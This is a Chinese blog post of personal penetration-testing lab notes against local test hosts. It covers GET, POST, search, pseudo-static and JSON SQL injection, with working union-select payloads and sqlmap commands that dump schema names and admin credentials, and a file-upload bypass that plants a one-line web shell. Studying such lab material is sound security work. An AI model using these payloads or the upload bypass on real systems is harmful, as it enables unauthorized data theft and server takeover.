部分笔记(未完待续)
2018-08-28 本文已影响0人
ch3nie
0x01 SQL注入
1.GET型SQL注入
http://192.168.0.8:2333/pentest/sql-injection-get.php?id=1
测试该url存在注入,且字段数为3
http://192.168.0.8:2333/pentest/sql-injection-get.php?id=1' order by 3--+
找回显2,3字段有回显
192.168.0.8:2333/pentest/sql-injection-get.php?id=-1' union select 1,2,3--+
data:image/s3,"s3://crabby-images/5ec4b/5ec4ba1ec30deb2943632d6f3e5839d06d86867a" alt=""
爆数据库
http://192.168.0.8:2333/pentest/sql-injection-get.php?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
data:image/s3,"s3://crabby-images/78829/7882977d2f897651760684d82e930efd72a49650" alt=""
data:image/s3,"s3://crabby-images/3a9c0/3a9c0d0ebd7f420b1d76ee999a7afd532297051d" alt=""
后续。。。。。。。你懂的
2.POST型注入
2.1sqlmap
抓一个POST包,另存为a.txt
data:image/s3,"s3://crabby-images/1a42a/1a42ab375dccb83537e19fdc46d40d62ac52d1cd" alt=""
python sqlmap.py -r C:\Users\CHEN\Desktop\a.txt
data:image/s3,"s3://crabby-images/9c78e/9c78e2b77cded1d23a2dfc310cf8ce2516d83780" alt=""
然后跑出每个库中的表
python2 sqlmap.py -r C:\Users\CHEN\Desktop\a.txt -p uname --tables
data:image/s3,"s3://crabby-images/a5931/a5931d566c03f7601a4177b121bd6e32399065c8" alt=""
2.2 手工
1' union select group_concat(database()),2 from information_schema.schemata#
1' union select group_concat(table_name),2 from information_schema.tables where table_schema='pentest'#
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
1' union select group_concat(username,password),2 from admin#
3.search型SQL注入
判断字段
data:image/s3,"s3://crabby-images/7bee9/7bee9652d0cc57dc16518b1defef49fe9794d235" alt=""
data:image/s3,"s3://crabby-images/ce3bc/ce3bca136d3dbec499c046d59d7d91fc3d619d6d" alt=""
爆数据库
admin' and 1=2 union select group_concat(schema_name) from information_schema.schemata#
data:image/s3,"s3://crabby-images/dd529/dd52956415b4adb5111cbbcd128e3de919c05d58" alt=""
4.伪静态注入
0x01伪静态注入1
emmmmmmm这好像是我第一次做伪静态的注入,讲真,之前还老是分辨不清伪静态和真静态QAQ
找出注入点很easy,但是不太会构造,然后尝试了很多次去构造
按照惯例,我们先判断字段数,一开始自己想的复杂了,还是不熟练sql注
http://192.168.0.26/pentest/userid-1' and 1=1 order by 3--+.html
让他前面报错,找回显
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,2,3--+.html
爆数据库(下面两个都行,只不过上面那个只查询出当前数据库,下面那个查询出该服务器上所有的)
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,group_concat(database()),3 --+.html
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+.html
爆pentest数据库的表
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pentest'--+.html
data:image/s3,"s3://crabby-images/440e6/440e638e3cce0907b4ab16845506d76746ad2069" alt=""
查询admin表的字段
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin'--+.html
data:image/s3,"s3://crabby-images/fe398/fe39829409f1a582dbc2c86a8b3d57ff15a9ae39" alt=""
获取账号密码
http://192.168.0.26/pentest/userid-1' and 1=2 union select 1,group_concat('username',';','password'),3 from admin--+.html
data:image/s3,"s3://crabby-images/9f4f8/9f4f840e1c65481ab4018c007558fe2b2df97a1a" alt=""
0X02伪静态注入2
常规找注入,查字段,找回显
data:image/s3,"s3://crabby-images/cf322/cf322fab856bf14768113079cc324d8c9399d4de" alt=""
爆数据库
http://192.168.0.102/pentest/userid/-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+/getpassword.html
data:image/s3,"s3://crabby-images/b371a/b371a4a1f1a3a5e7438c5e8c5aac84fb1220ff6c" alt=""
剩下的。。。。
5.JSON注入
admin' and 1=2 union select group_concat(schema_name) from information_schema.schemata--+
data:image/s3,"s3://crabby-images/1ad30/1ad30925a4b6ce978e634af7aa4d023c158d5db4" alt=""
data:image/s3,"s3://crabby-images/bfab5/bfab5425ba6dd797e2defea6d7ef07d96405b39b" alt=""
0x03 上传
在上传之前我们先看一下源码进行一下分析,他检测的是上传文件的后缀,且这是PHP的网站
data:image/s3,"s3://crabby-images/62840/62840acacff55defc1602703972c4a1192d2f3f7" alt=""
抓包改后缀
我们可以写一个一句话的木马,文件后缀改为.php;.jpg
然后上传绕过js前端验证,抓包,把文件后缀.php;.jpg改为.php 然后成功上传返回路径,然后用菜刀连接
data:image/s3,"s3://crabby-images/568da/568daef68f4bc04888d98b7a2a58571555ddc778" alt=""
data:image/s3,"s3://crabby-images/25d13/25d13f7f99b2b0cd5b17277c052b0b6e37a4c144" alt=""
00截断
上传文件名为“00jieduan.php+.jpg”的一句话木马,然后抓包,把加号(+) 0x2b改为0x00然后发包
data:image/s3,"s3://crabby-images/99d50/99d500a1abce074c7fe9aec14a2518098beedbf9" alt=""
上传成功,访问木马http://192.168.171.142/pentest/uploads/00jieduan.php,用菜刀连接
改前端js
data:image/s3,"s3://crabby-images/ce105/ce1053d28c0c924dbbaa45bb31a145e98d3c8d71" alt=""
data:image/s3,"s3://crabby-images/e0750/e07504de8ca4d8bc62586cd795e3f55af5f8ea74" alt=""